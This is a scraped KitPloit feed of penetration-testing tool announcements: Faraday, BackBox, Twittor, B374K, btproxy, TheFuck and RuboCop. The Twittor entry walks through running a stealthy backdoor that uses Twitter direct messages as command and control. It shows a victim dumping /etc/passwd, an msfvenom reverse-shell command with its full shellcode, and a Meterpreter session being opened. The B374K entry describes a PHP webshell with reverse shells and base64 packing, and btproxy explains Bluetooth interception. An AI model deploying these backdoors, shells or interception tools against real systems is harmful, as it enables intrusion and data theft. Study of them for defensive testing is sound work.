Quantcast
Channel: KitPloit - PenTest Tools!
Viewing all 5816 articles
Browse latest View live

Faraday 1.0.15 - Collaborative Penetration Test and Vulnerability Management Platform

$
0
0

A brand new version is ready for you to enjoy! Faraday v1.0.15 (Community, Pro & Corp) was published today with new exciting features.

As a part of our constant commitment to the IT sec community we added a tool that runs several other tools to all IPs in a given list. This results in a major scan to your infrastructure which can be done as frequently as necessary. Interested? Read more about it here.

This version also features three new plugins and a fix developed entirely by our community! Congratulations to Andres and Ezequiel for being the first two winners of the Faraday Challenge! Are you interested in winning tickets for Ekoparty as well? Submit your pull request or find us on freenode #faraday-dev and let us know.

Changes:

* Continuous Scanning Tool cscan added to ./scripts/cscan
* Hosts and Services views now have pagination and search



* Updates version number on Faraday Start
* Added Services columns to Status Report


* Converted references to links in Status Report. Support for CVE, CWE, Exploit Database and Open Source Vulnerability Database
* Added Pippingtom, SSHdefaultscan and pasteAnalyzer plugins

Fixes: 

* Debian install
* Saving objects without parent
* Visual fixes on Firefox



BackBox Linux 4.4 - Ubuntu-based Linux Distribution Penetration Test and Security Assessment

$
0
0

BackBox is a Linux distribution based on Ubuntu. It has been developed to perform penetration tests and security assessments. Designed to be fast, easy to use and provide a minimal yet complete desktop environment, thanks to its own software repositories, always being updated to the latest stable version of the most used and best known ethical hacking tools.

The release have some special new features included to keep BackBox up to date with last developments in security world. Tools such as OpenVAS and Automotive Analysis will make a big difference. BackBox 4.4 comes also with Kernel 3.19.

What's new
  • Preinstalled Linux Kernel 3.19
  • New Ubuntu 14.04.3 base
  • Ruby 2.1
  • Installer with LVM and Full Disk Encryption options
  • Handy Thunar custom actions
  • RAM wipe at shutdown/reboot
  • System improvements
  • Upstream components
  • Bug corrections
  • Performance boost
  • Improved Anonymous mode
  • Automotive Analysis category
  • Predisposition to ARM architecture (armhf Debian packages)
  • Predisposition to BackBox Cloud platform
  • New and updated hacking tools: apktool, armitage, beef-project, can-utils, dex2jar, fimap, jd-gui, metasploit-framework, openvas, setoolkit, sqlmap, tor, weevely, wpscan, zaproxy, etc.

System requirements
  • 32-bit or 64-bit processor
  • 512 MB of system memory (RAM)
  • 6 GB of disk space for installation
  • Graphics card capable of 800×600 resolution
  • DVD-ROM drive or USB port (2 GB)

Upgrade instructions
To upgrade from a previous version (BackBox 4.x) follow these instructions:
sudo apt-get update
sudo apt-get dist-upgrade
sudo apt-get install -f
sudo apt-get install linux-image-generic-lts-vivid linux-headers-generic-lts-vivid linux-signed-image-generic-lts-vivid
sudo apt-get purge ri1.9.1 ruby1.9.1 ruby1.9.3 bundler
sudo gem cleanup
sudo rm -rf /var/lib/gems/1.*
sudo apt-get install backbox-default-settings backbox-desktop backbox-menu backbox-tools --reinstall
sudo apt-get install beef-project metasploit-framework whatweb wpscan setoolkit --reinstallsudo apt-get autoremove --purge
sudo apt-get install openvas sqlite3
sudo openvas-launch sync
sudo openvas-launch start


Twittor - A fully featured backdoor that uses Twitter as a C&C server

$
0
0

A stealthy Python based backdoor that uses Twitter (Direct Messages) as a command and control server This project has been inspired by Gcat which does the same but using a Gmail account.

Setup
For this to work you need:
  • A Twitter account ( Use a dedicated account! Do not use your personal one! )
  • Register an app on Twitter with Read, write, and direct messages Access levels.
Install the dependencies:
$ pip install -r requirements.txt
This repo contains two files:
  • twittor.py which is the client
  • implant.py the actual backdoor to deploy
In both files, edit the access token part and add the ones that you previously generated:
CONSUMER_TOKEN = 'XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX'
CONSUMER_SECRET = 'XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX'

ACCESS_TOKEN = 'XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX'
ACCESS_TOKEN_SECRET = 'XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX'

USERNAME = 'XXXXXXXXXXXXXXXXXXXXXXXX'
You're probably going to want to compile implant.py into an executable using Pyinstaller In order to remove the console when compiling with Pyinstaller, the flags --noconsole --onefile will help. Just saying.

Usage
In order to run the client, launch the script.
$ python twittor.py
You'll then get into an 'interactive' shell which offers few commands that are:
$ help

refresh - refresh C&C control
list_bots - list active bots
list_commands - list executed commands
!retrieve <jobid> - retrieve jobid command
!cmd <MAC ADDRESS> command - execute the command on the bot
!shellcode <MAC ADDRESS> shellcode - load and execute shellcode in memory (Windows only)
help - print this usage
exit - exit the client

$
  • Once you've deployed the backdoor on a couple of systems, you can check available clients using the list command:
$ list_bots
B7:76:1F:0B:50:B7: Linux-x.x.x-generic-x86_64-with-Ubuntu-14.04-precise
$
The output is the MAC address which is used to uniquely identifies the system but also gives you OS information the implant is running on. In that case a Linux box.
  • Let's issue a command to an implant:
$ !cmd B7:76:1F:0B:50:B7 cat /etc/passwd
[+] Sent command "cat /etc/passwd" with jobid: UMW07r2
$
Here we are telling B7:76:1F:0B:50:B7 to execute cat /etc/passwd , the script then outputs the jobid that we can use to retrieve the output of that command
  • Lets get the results!
$ !retrieve UMW07r2
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
(...)
Command to use in that case is !retrieve followed by the jobid from the command.
  • Refresh results
In order to retrieve new bots/command outputs but also force the client to refresh the results, use the refresh command.
$ refresh
[+] Sending command to retrieve alive bots
[+] Sleeping 10 secs to wait for bots
$
This will send a PING request and wait 10 seconds for them to answer. Direct messages will then be parsed - Bot list will be refreshed but also the command list, including new command outputs.
  • Retrieve previous commands
As I said earlier, (previous) commands will be retrieved from older direct messages (limit is 200) and you can actually retrieve/see them by using the list_commands command
$ list_commands
8WNzapM: 'uname -a ' on 2C:4C:84:8C:D3:B1
VBQpojP: 'cat /etc/passwd' on 2C:4C:84:8C:D3:B1
9KaVJf6: 'PING' on 2C:4C:84:8C:D3:B1
aCu8jG9: 'ls -al' on 2C:4C:84:8C:D3:B1
8LRtdvh: 'PING' on 2C:4C:84:8C:D3:B1
$
  • Running shellcode (Windows hosts)
This option might be handy in order to retrieve a meterpreter session and this article becomes really useful.
Generate your meterpreter shellcode, like:
# msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=3615 -f python
(...)
Payload size: 299 bytes
buf = ""
buf += "\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b"
buf += "\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7"
buf += "\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf"
buf += "\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c"
buf += "\x8b\x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01"
buf += "\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31"
buf += "\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d"
buf += "\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66"
buf += "\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0"
buf += "\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f"
buf += "\x5f\x5a\x8b\x12\xeb\x8d\x5d\x68\x33\x32\x00\x00\x68"
buf += "\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8"
buf += "\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00"
buf += "\xff\xd5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea\x0f"
buf += "\xdf\xe0\xff\xd5\x97\x6a\x05\x68\x0a\x00\x00\x01\x68"
buf += "\x02\x00\x0e\x1f\x89\xe6\x6a\x10\x56\x57\x68\x99\xa5"
buf += "\x74\x61\xff\xd5\x85\xc0\x74\x0a\xff\x4e\x08\x75\xec"
buf += "\xe8\x3f\x00\x00\x00\x6a\x00\x6a\x04\x56\x57\x68\x02"
buf += "\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7e\xe9\x8b\x36\x6a"
buf += "\x40\x68\x00\x10\x00\x00\x56\x6a\x00\x68\x58\xa4\x53"
buf += "\xe5\xff\xd5\x93\x53\x6a\x00\x56\x53\x57\x68\x02\xd9"
buf += "\xc8\x5f\xff\xd5\x83\xf8\x00\x7e\xc3\x01\xc3\x29\xc6"
buf += "\x75\xe9\xc3\xbb\xf0\xb5\xa2\x56\x6a\x00\x53\xff\xd5"
Extract the shellcode and send it to the specified bot using the !shellcode command!
$ !shellcode 11:22:33:44:55 \xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b (...)
[+] Sent shellcode with jobid: xdr7mtN
$
Et voilà!
msf exploit(handler) > exploit

[*] Started reverse handler on 10.0.0.1:3615
[*] Starting the payload handler...
[*] Sending stage (884270 bytes) to 10.0.0.99
[*] Meterpreter session 1 opened (10.0.0.1:3615 -> 10.0.0.99:49254) at 2015-09-08 10:19:04 -0400

meterpreter > getuid
Server username: WIN-XXXXXXXXX\PaulSec
Open a beer and enjoy your reverse meterpreter shell.


B374K - PHP Webshell with handy features

$
0
0

This PHP Shell is a useful tool for system or web administrator to do remote management without using cpanel, connecting using ssh, ftp etc. All actions take place within a web browser.

Features :
  • File manager (view, edit, rename, delete, upload, download, archiver, etc)
  • Search file, file content, folder (also using regex)
  • Command execution
  • Script execution (php, perl, python, ruby, java, node.js, c)
  • Give you shell via bind/reverse shell connect
  • Simple packet crafter
  • Connect to DBMS (mysql, mssql, oracle, sqlite, postgresql, and many more using ODBC or PDO)
  • SQL Explorer
  • Process list/Task manager
  • Send mail with attachment (you can attach local file on server)
  • String conversion
  • All of that only in 1 file, no installation needed
  • Support PHP > 4.3.3 and PHP 5

Requirements :
  • PHP version > 4.3.3 and PHP 5
  • As it using zepto.js v1.1.2, you need modern browser to use b374k shell. See browser support on zepto.js website http://zeptojs.com/
  • Responsibility of what you do with this shell

Installation :
Download b374k.php (default password : b374k), edit and change password and upload b374k.php to your server, password is in sha1(md5()) format. Or create your own b374k.php, explained below

Customize :
After finished doing editing with files, upload index.php, base, module, theme and all files inside it to a server
Using Web Browser :
Open index.php in your browser, quick run will only run the shell. Use packer to pack all files into single PHP file. Set all the options available and the output file will be in the same directory as index.php
Using Console :
$ php -f index.php
b374k shell packer 0.4

options :
-o filename save as filename
-p password protect with password
-t theme theme to use
-m modules modules to pack separated by comma
-s strip comments and whitespaces
-b encode with base64
-z [no|gzdeflate|gzencode|gzcompress] compression (use only with -b)
-c [0-9] level of compression
-l list available modules
-k list available themes
example :
$ php -f index.php -- -o myShell.php -p myPassword -s -b -z gzcompress -c 9
Don't forget to delete index.php, base, module, theme and all files inside it after you finished. Because it is not protected with password so it can be a security threat to your server


TheFuck - Magnificent App Which Corrects Your Previous Console Command

$
0
0

Few examples:
➜ apt-get install vim
E: Could not open lock file /var/lib/dpkg/lock - open (13: Permission denied)
E: Unable to lock the administration directory (/var/lib/dpkg/), are you root?

➜ fuck
sudo apt-get install vim [enter/↑/↓/ctrl+c]
[sudo] password for nvbn:
Reading package lists... Done
...

➜ git push
fatal: The current branch master has no upstream branch.
To push the current branch and set the remote as upstream, use

git push --set-upstream origin master


➜ fuck
git push --set-upstream origin master [enter/↑/↓/ctrl+c]
Counting objects: 9, done.
...
➜ puthon
No command 'puthon' found, did you mean:
Command 'python' from package 'python-minimal' (main)
Command 'python' from package 'python3' (main)
zsh: command not found: puthon

➜ fuck
python [enter/↑/↓/ctrl+c]
Python 3.4.2 (default, Oct 8 2014, 13:08:17)
...
➜ git brnch
git: 'brnch' is not a git command. See 'git --help'.

Did you mean this?
branch

➜ fuck
git branch [enter/↑/↓/ctrl+c]
* master
➜ lein rpl
'rpl' is not a task. See 'lein help'.

Did you mean this?
repl

➜ fuck
lein repl [enter/↑/↓/ctrl+c]
nREPL server started on port 54848 on host 127.0.0.1 - nrepl://127.0.0.1:54848
REPL-y 0.3.1
...
If you are not scared to blindly run the changed command, there is a require_confirmation settings option:
➜ apt-get install vim
E: Could not open lock file /var/lib/dpkg/lock - open (13: Permission denied)
E: Unable to lock the administration directory (/var/lib/dpkg/), are you root?

➜ fuck
sudo apt-get install vim
[sudo] password for nvbn:
Reading package lists... Done
...

Requirements
  • python (2.7+ or 3.3+)
  • pip
  • python-dev

Installation [ experimental ]
On Ubuntu and OS X you can install The Fuck with installation script:
wget -O - https://raw.githubusercontent.com/nvbn/thefuck/master/install.sh | sh - && $0

Manual installation
Install The Fuck with pip :
sudo pip install thefuck
Or using an OS package manager (OS X, Ubuntu, Arch).
You should place this command in your .bash_profile , .bashrc , .zshrc or other startup script:
eval "$(thefuck --alias)"
# You can use whatever you want as an alias, like for Mondays:
eval "$(thefuck --alias FUCK)"
Or in your shell config (Bash, Zsh, Fish, Powershell, tcsh).
Changes will be available only in a new shell session. To make them available immediately, run source ~/.bashrc (or your shell config file like .zshrc ).

Update
sudo pip install thefuck --upgrade
Aliases changed in 1.34.

How it works
The Fuck tries to match a rule for the previous command, creates a new command using the matched rule and runs it. Rules enabled by default are as follows:
  • cargo – runs cargo build instead of cargo ;
  • cargo_no_command – fixes wrongs commands like cargo buid ;
  • cd_correction – spellchecks and correct failed cd commands;
  • cd_mkdir – creates directories before cd'ing into them;
  • cd_parent – changes cd.. to cd .. ;
  • composer_not_command – fixes composer command name;
  • cp_omitting_directory – adds -a when you cp directory;
  • cpp11 – adds missing -std=c++11 to g++ or clang++ ;
  • dirty_untar – fixes tar x command that untarred in the current directory;
  • dirty_unzip – fixes unzip command that unzipped in the current directory;
  • django_south_ghost – adds --delete-ghost-migrations to failed because ghosts django south migration;
  • django_south_merge – adds --merge to inconsistent django south migration;
  • docker_not_command – fixes wrong docker commands like docker tags ;
  • dry – fixes repetitions like git git push ;
  • fix_alt_space – replaces Alt+Space with Space character;
  • fix_file – opens a file with an error in your $EDITOR ;
  • git_add – fixes "Did you forget to 'git add'?" ;
  • git_branch_delete – changes git branch -d to git branch -D ;
  • git_branch_list – catches git branch list in place of git branch and removes created branch;
  • git_checkout – fixes branch name or creates new branch;
  • git_diff_staged – adds --staged to previous git diff with unexpected output;
  • git_fix_stash – fixes git stash commands (misspelled subcommand and missing save );
  • git_not_command – fixes wrong git commands like git brnch ;
  • git_pull – sets upstream before executing previous git pull ;
  • git_pull_clone – clones instead of pulling when the repo does not exist;
  • git_push – adds --set-upstream origin $branch to previous failed git push ;
  • git_push_pull – runs git pull when push was rejected;
  • git_stash – stashes you local modifications before rebasing or switching branch;
  • git_two_dashes – adds a missing dash to commands like git commit -amend or git rebase -continue ;
  • go_run – appends .go extension when compiling/running Go programs
  • grep_recursive – adds -r when you trying to grep directory;
  • gulp_not_task – fixes misspelled gulp tasks;
  • has_exists_script – prepends ./ when script/binary exists;
  • heroku_not_command – fixes wrong heroku commands like heroku log ;
  • history – tries to replace command with most similar command from history;
  • java – removes .java extension when running Java programs;
  • javac – appends missing .java when compiling Java files;
  • lein_not_task – fixes wrong lein tasks like lein rpl ;
  • ls_lah – adds -lah to ls ;
  • man – changes manual section;
  • man_no_space – fixes man commands without spaces, for example mandiff ;
  • mercurial – fixes wrong hg commands;
  • mkdir_p – adds -p when you trying to create directory without parent;
  • mvn_no_command – adds clean package to mvn ;
  • mvn_unknown_lifecycle_phase – fixes misspelled lifecycle phases with mvn ;
  • no_command – fixes wrong console commands, for example vom/vim ;
  • no_such_file – creates missing directories with mv and cp commands;
  • open – prepends http to address passed to open ;
  • pip_unknown_command – fixes wrong pip commands, for example pip instatl/pip install ;
  • python_command – prepends python when you trying to run not executable/without ./ python script;
  • python_execute – appends missing .py when executing Python files;
  • quotation_marks – fixes uneven usage of ' and " when containing args';
  • rm_dir – adds -rf when you trying to remove directory;
  • sed_unterminated_s – adds missing '/' to sed 's s commands;
  • sl_ls – changes sl to ls ;
  • ssh_known_hosts – removes host from known_hosts on warning;
  • sudo – prepends sudo to previous command if it failed because of permissions;
  • switch_lang – switches command from your local layout to en;
  • systemctl – correctly orders parameters of confusing systemctl ;
  • test.py – runs py.test instead of test.py ;
  • touch – creates missing directories before "touching";
  • tsuru_login – runs tsuru login if not authenticated or session expired;
  • tsuru_not_command – fixes wrong tsuru commands like tsuru shell ;
  • tmux – fixes tmux commands;
  • unknown_command – fixes hadoop hdfs-style "unknown command", for example adds missing '-' to the command on hdfs dfs ls ;
  • vagrant_up – starts up the vagrant instance;
  • whois – fixes whois command.
Enabled by default only on specific platforms:
  • apt_get – installs app from apt if it not installed (requires python-commandnotfound / python3-commandnotfound );
  • apt_get_search – changes trying to search using apt-get with searching using apt-cache ;
  • brew_install – fixes formula name for brew install ;
  • brew_unknown_command – fixes wrong brew commands, for example brew docto/brew doctor ;
  • brew_upgrade – appends --all to brew upgrade as per Homebrew's new behaviour;
  • pacman – installs app with pacman if it is not installed (uses yaourt if available);
  • pacman_not_found – fixes package name with pacman or yaourt .
Bundled, but not enabled by default:
  • git_push_force – adds --force to a git push (may conflict with git_push_pull );
  • rm_root – adds --no-preserve-root to rm -rf / command.

Creating your own rules
For adding your own rule you should create your-rule-name.py in ~/.thefuck/rules . The rule should contain two functions:
match(command: Command) -> bool
get_new_command(command: Command) -> str | list[str]
Also the rule can contain an optional function
side_effect(old_command: Command, fixed_command: str) -> None
and optional enabled_by_default , requires_output and priority variables.
Command has three attributes: script , stdout and stderr .
Rules api changed in 3.0: For accessing settings in rule you need to import it with from thefuck.conf import settings . settings is a special object filled with ~/.thefuck/settings.py and values from env ( see more below ).
Simple example of the rule for running script with sudo :
def match(command):
return ('permission denied' in command.stderr.lower()
or 'EACCES' in command.stderr)


def get_new_command(command):
return 'sudo {}'.format(command.script)

# Optional:
enabled_by_default = True

def side_effect(command, fixed_command):
subprocess.call('chmod 777 .', shell=True)

priority = 1000 # Lower first, default is 1000

requires_output = True
More examples of rules , utility functions for rules , app/os-specific helpers .

Settings
The Fuck has a few settings parameters which can be changed in ~/.thefuck/settings.py :
  • rules – list of enabled rules, by default thefuck.conf.DEFAULT_RULES ;
  • exclude_rules – list of disabled rules, by default [] ;
  • require_confirmation – requires confirmation before running new command, by default True ;
  • wait_command – max amount of time in seconds for getting previous command output;
  • no_colors – disable colored output;
  • priority – dict with rules priorities, rule with lower priority will be matched first;
  • debug – enables debug output, by default False .
Example of settings.py :
rules = ['sudo', 'no_command']
exclude_rules = ['git_push']
require_confirmation = True
wait_command = 10
no_colors = False
priority = {'sudo': 100, 'no_command': 9999}
debug = False
Or via environment variables:
  • THEFUCK_RULES – list of enabled rules, like DEFAULT_RULES:rm_root or sudo:no_command ;
  • THEFUCK_EXCLUDE_RULES – list of disabled rules, like git_pull:git_push ;
  • THEFUCK_REQUIRE_CONFIRMATION – require confirmation before running new command, true/false ;
  • THEFUCK_WAIT_COMMAND – max amount of time in seconds for getting previous command output;
  • THEFUCK_NO_COLORS – disable colored output, true/false ;
  • THEFUCK_PRIORITY – priority of the rules, like no_command=9999:apt_get=100 , rule with lower priority will be matched first;
  • THEFUCK_DEBUG – enables debug output, true/false .
For example:
export THEFUCK_RULES='sudo:no_command'
export THEFUCK_EXCLUDE_RULES='git_pull:git_push'
export THEFUCK_REQUIRE_CONFIRMATION='true'
export THEFUCK_WAIT_COMMAND=10
export THEFUCK_NO_COLORS='false'
export THEFUCK_PRIORITY='no_command=9999:apt_get=100'

Developing
Install The Fuck for development:
pip install -r requirements.txt
python setup.py develop
Run unit tests:
py.test
Run unit and functional tests (requires docker):
py.test --enable-functional
For sending package to pypi:
sudo apt-get install pandoc
./release.py


Btproxy - Man In The Middle Analysis Tool For Bluetooth

$
0
0

Tested Devices
  • Pebble Steel smart watch
  • Moto 360 smart watch
  • OBDLink OBD-II Bluetooth Dongle
  • Withings Smart Baby Monitor
If you have tried anything else, please let me know at conorpp (at) vt (dot) edu.

Dependencies
  • Need at least 1 Bluetooth card (either USB or internal).
  • Need to be running Linux, another *nix, or OS X.
  • BlueZ 4
For a debian system, run
sudo apt-get install bluez bluez-utils bluez-tools libbluetooth-dev python-dev

Installation
sudo python setup.py install

Running
To run a simple MiTM or proxy on two devices, run
btproxy <master-bt-mac-address> <slave-bt-mac-address>
Run btproxy to get a list of command arguments.

Example
# This will connect to the slave 40:14:33:66:CC:FF device and 
# wait for a connection from the master F1:64:F3:31:67:88 device
btproxy F1:64:F3:31:67:88 40:14:33:66:CC:FF
Where the master is typically the phone and the slave mac address is typically the other peripherial device (smart watch, headphones, keyboard, obd2 dongle, etc).
The master is the device the sends the connection request and the slave is the device listening for something to connect to it.
After the proxy connects to the slave device and the master connects to the proxy device, you will be able to see traffic and modify it.

How to find the BT MAC Address?
Well, you can look it up in the settings usually for a phone. The most robost way is to put the device in advertising mode and scan for it.
There are two ways to scan for devices: scanning and inquiring. hcitool can be used to do this:
hcitool scan
hcitool inq
To get a list of services on a device:
sdptool records <bt-address>

Usage
Some devices may restrict connecting based on the name, class, or address of another bluetooth device.
So the program will lookup those three properties of the target devices to be proxied, and then clone them onto the proxying adapter(s).
Then it will first try connecting to the slave device from the cloned master adaptor. It will make a socket for each service hosted by the slave and relay traffic for each one independently.
After the slave is connected, the cloned slave adaptor will be set to be listening for a connection from the master. At this point, the real master device should connect to the adaptor. After the master connects, the proxied connection is complete.

Using only one adapter
This program uses either 1 or 2 Bluetooth adapters. If you use one adapter, then only the slave device will be cloned. Both devices will be cloned if 2 adapters are used; this might be necessary for more restrictive Bluetooth devices.

Advanced Usage
Manipulation of the traffic can be handled via python by passing an inline script. Just implement the master_cb and slave_cb callback functions. This are called upon receiving data and the returned data is sent back out to the corresponding device.
# replace.py
def master_cb(req):
"""
Received something from master, about to be sent to slave.
"""
print '<< ', repr(req)
open('mastermessages.log', 'a+b').write(req)
return req

def slave_cb(res):
"""
Same as above but it's from slave about to be sent to master
"""
print '>> ', repr(res)
open('slavemessages.log', 'a+b').write(res)
return res
Also see the example functions for manipulating Pebble watch traffic in replace.py
This code can be edited and reloaded during runtime by entering 'r' into the program console. This avoids the pains of reconnecting. Any errors will be caught and regular transmission will continue.

TODO
  • BLE
  • Improve the file logging of the traffic and make it more interactive for
  • replays/manipulation.
  • Indicate which service is which in the output.
  • Provide control for disconnecting/connecting services.
  • PCAP file support
  • ncurses?

How it works
This program starts by killing the bluetoothd process, running it again with a LD_PRELOAD pointed to a wrapper for the bind system call to block bluetoothd from binding to L2CAP port 1 (SDP). All SDP traffic goes over L2CAP port 1 so this makes it easy to MiTM/forward between the two devices and we don't have to worry about mimicking the advertising.
The program first scans each device for their name and device class to make accurate clones. It will append the string '_btproxy' to each name to make them distinguishable from a user perspective. Alternatively, you can specify the names to use at the command line.
The program then scans the services of the slave device. It makes a socket connection to each service and open a listening port for the master device to connect to. Once the master connects, the Proxy/MiTM is complete and output will be sent to STDOUT.

Notes
Some bluetooth devices have different methods of pairing which makes this process more complicated. Right now it supports SPP and legacy pin pairing.
This program doesn't yet have support for Bluetooth Low Energy. A similiar approach to BLE can be taken.

Errors

btproxy or bluetoothd hangs
If you are using bluez 5, you should try uninstalling and installing bluez 4 . I've had problems with bluez 5 hanging.

error accessing bluetooth device
Make sure the bluetooth adaptors are plugged in and enabled.
Run
    # See the list of all adaptors
hciconfig -a

# Enable
sudo hciconfig hciX up

# if you get this message
Can't init device hci0: Operation not possible due to RF-kill (132)

# Then try unblocking it with the rfkill command
sudo rfkill unblock all

UserWarning: <path>/.python-eggs is writable by group/others
Fix
chmod g-rw,o-x <path>/.python-eggs


Rubocop - A Ruby Static Code Analyzer, Based On The Community Ruby Style Guide

$
0
0

RuboCop is a Ruby static code analyzer. Out of the box it will enforce many of the guidelines outlined in the community Ruby Style Guide .

Most aspects of its behavior can be tweaked via various configuration options.

Installation
RuboCop 's installation is pretty standard:
$ gem install rubocop
If you'd rather install RuboCop using bundler , don't require it in your Gemfile :
gem 'rubocop', require: false

Basic Usage
Running rubocop with no arguments will check all Ruby source files in the current directory:
$ rubocop
Alternatively you can pass rubocop a list of files and directories to check:
$ rubocop app spec lib/something.rb
Here's RuboCop in action. Consider the following Ruby source code:
def badName
if something
test
end
end
Running RuboCop on it (assuming it's in a file named test.rb ) would produce the following report:
Inspecting 1 file
W

Offenses:

test.rb:1:5: C: Use snake_case for method names.
def badName
^^^^^^^
test.rb:2:3: C: Use a guard clause instead of wrapping the code inside a conditional expression.
if something
^^
test.rb:2:3: C: Favor modifier if usage when having a single-line body. Another good alternative is the usage of control flow &&/||.
if something
^^
test.rb:4:5: W: end at 4, 4 is not aligned with if at 2, 2
end
^^^

1 file inspected, 4 offenses detected
For more details check the available command-line options:
$ rubocop -h
Command flag Description
-v/--version Displays the current version and exits.
-V/--verbose-version Displays the current version plus the version of Parser and Ruby.
-L/--list-target-files List all files RuboCop will inspect.
-F/--fail-fast Inspects in modification time order and stops after first file with offenses.
-C/--cache Store and reuse results for faster operation.
-d/--debug Displays some extra debug output.
-D/--display-cop-names Displays cop names in offense messages.
-c/--config Run with specified config file.
-f/--format Choose a formatter.
-o/--out Write output to a file instead of STDOUT.
-r/--require Require Ruby file (see Loading Extensions ).
-R/--rails Run extra Rails cops.
-l/--lint Run only lint cops.
-a/--auto-correct Auto-correct certain offenses. Note: Experimental - use with caution.
--only Run only the specified cop(s) and/or cops in the specified departments.
--except Run all cops enabled by configuration except the specified cop(s) and/or departments.
--auto-gen-config Generate a configuration file acting as a TODO list.
--exclude-limit Limit how many individual files --auto-gen-config can list in Exclude parameters, default is 15.
--show-cops Shows available cops and their configuration.
--fail-level Minimum severity for exit with error code. Full severity name or upper case initial can be given. Normally, auto-corrected offenses are ignored. Use A or autocorrect if you'd like them to trigger failure.
-s/--stdin Pipe source from STDIN. This is useful for editor integration.

Cops
In RuboCop lingo the various checks performed on the code are called cops. There are several cop departments.
You can also load custom cops .

Style
Most of the cops in RuboCop are so called style cops that check for stylistics problems in your code. Almost all of the them are based on the Ruby Style Guide. Many of the style cops have configurations options allowing them to support different popular coding conventions.

Lint
Lint cops check for possible errors and very bad practices in your code. RuboCop implements in a portable way all built-in MRI lint checks ( ruby -wc ) and adds a lot of extra lint checks of its own. You can run only the lint cops like this:
$ rubocop -l
The -l / --lint option can be used together with --only to run all the enabled lint cops plus a selection of other cops.
Disabling any of the lint cops is generally a bad idea.

Metrics
Metrics cops deal with properties of the source code that can be measured, such as class length, method length, etc. Generally speaking, they have a configuration parameter called Max and when running rubocop --auto-gen-config , this parameter will be set to the highest value found for the inspected code.

Rails
Rails cops are specific to the Ruby on Rails framework. Unlike style and lint cops they are not used by default and you have to request them specifically:
$ rubocop -R
or add the following directive to your .rubocop.yml :
AllCops:
RunRailsCops: true

Configuration
The behavior of RuboCop can be controlled via the .rubocop.yml configuration file. It makes it possible to enable/disable certain cops (checks) and to alter their behavior if they accept any parameters. The file can be placed either in your home directory or in some project directory.
RuboCop will start looking for the configuration file in the directory where the inspected file is and continue its way up to the root directory.
The file has the following format:
inherit_from: ../.rubocop.yml

Style/Encoding:
Enabled: false

Metrics/LineLength:
Max: 99
Note : Qualifying cop name with its type, e.g., Style , is recommended, but not necessary as long as the cop name is unique across all types.

Inheritance
RuboCop supports inheriting configuration from one or more supplemental configuration files at runtime.

Inheriting from another configuration file in the project
The optional inherit_from directive is used to include configuration from one or more files. This makes it possible to have the common project settings in the .rubocop.yml file at the project root, and then only the deviations from those rules in the subdirectories. The files can be given with absolute paths or paths relative to the file where they are referenced. The settings after an inherit_from directive override any settings in the file(s) inherited from. When multiple files are included, the first file in the list has the lowest precedence and the last one has the highest. The format for multiple inheritance is:
inherit_from:
- ../.rubocop.yml
- ../conf/.rubocop.yml

Inheriting configuration from a dependency gem
The optional inherit_gem directive is used to include configuration from one or more gems external to the current project. This makes it possible to inherit a shared dependency's RuboCop configuration that can be used from multiple disparate projects.
Configurations inherited in this way will be essentially prepended to the inherit_from directive, such that the inherit_gem configurations will be loaded first, then the inherit_from relative file paths will be loaded (overriding the configurations from the gems), and finally the remaining directives in the configuration file will supersede any of the inherited configurations. This means the configurations inherited from one or more gems have the lowest precedence of inheritance.
The directive should be formatted as a YAML Hash using the gem name as the key and the relative path within the gem as the value:
inherit_gem:
rubocop: config/default.yml
my-shared-gem: .rubocop.yml
cucumber: conf/rubocop.yml
Note : If the shared dependency is declared using a Bundler Gemfile and the gem was installed using bundle install , it would be necessary to also invoke RuboCop using Bundler in order to find the dependency's installation path at runtime:
$ bundle exec rubocop <options...>

Defaults
The file config/default.yml under the RuboCop home directory contains the default settings that all configurations inherit from. Project and personal .rubocop.yml files need only make settings that are different from the default ones. If there is no .rubocop.yml file in the project or home directory, config/default.yml will be used.

Including/Excluding files
